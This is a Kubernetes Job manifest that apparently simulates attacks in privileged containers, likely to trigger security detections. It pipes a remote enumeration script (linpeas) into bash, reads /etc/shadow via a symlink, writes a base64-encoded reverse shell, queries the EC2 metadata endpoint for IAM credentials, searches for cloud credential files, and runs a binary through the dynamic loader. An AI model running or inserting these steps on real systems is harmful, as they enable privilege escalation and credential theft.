apiVersion: batch/v1
kind: Job
metadata:
  name: stg-job
spec:
  template:
    spec:
      containers:
      - name: stg-job-homedir
        image: nginx:latest
        command: ["bash", "-c", "useradd -m -d /tmp/usr1 usr1 && sleep 15 && userdel -r usr1 2>/dev/null"]
        securityContext:
          privileged: true
      - name: stg-job-linpeas
        image: nginx:latest
        command: ["bash", "-c", "curl -q -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | bash -s -- -o system_information,container -q"]
        securityContext:
          privileged: true
      - name: stg-job-symlink
        image: nginx:latest
        command:
        - bash
        - -c
        - |
          mkdir "/tmp/tmp_symlink_dir"; cd "/tmp/tmp_symlink_dir"
          ln -s /etc/shadow shadow
          cat shadow
          rm -r "/tmp/tmp_symlink_dir"
        securityContext:
          privileged: true
      - name: stg-job-base
        image: nginx:latest
        command:
        - bash
        - -c
        - |
          echo IyEvYmluL3NoCnNoIC1pID4mIC9kZXYvdGNwLzEyNy4wLjAuMS8xMzM3IDA+JjEK | base64 -d > "/tmp/tmp_script.sh"
          rm -f "/tmp/tmp_script.sh"
        securityContext:
          privileged: true
      - name: stg-job-ec2meta
        image: nginx:latest
        command: ["bash", "-c", "curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials"]
        securityContext:
          privileged: true
      - name: stg-job-azure
        image: nginx:latest
        command: ["bash", "-c", "find /home /root /etc -wholename '*azure.json'"]
        securityContext:
          privileged: true
      - name: stg-job-gcp
        image: nginx:latest
        command: ["bash", "-c", "find /home /root /etc -wholename '*active_config'"]
        securityContext:
          privileged: true
      - name: stg-job-ld
        image: nginx:latest
        command:
        - bash
        - -c
        - |
          cp "$(which ls)" /tmp/prog
          chmod ugo-x /tmp/prog
          /lib64/ld-linux-x86-64.so.2 /tmp/prog
          rm /tmp/prog
        securityContext:
          privileged: true
      restartPolicy: Never
  backoffLimit: 1
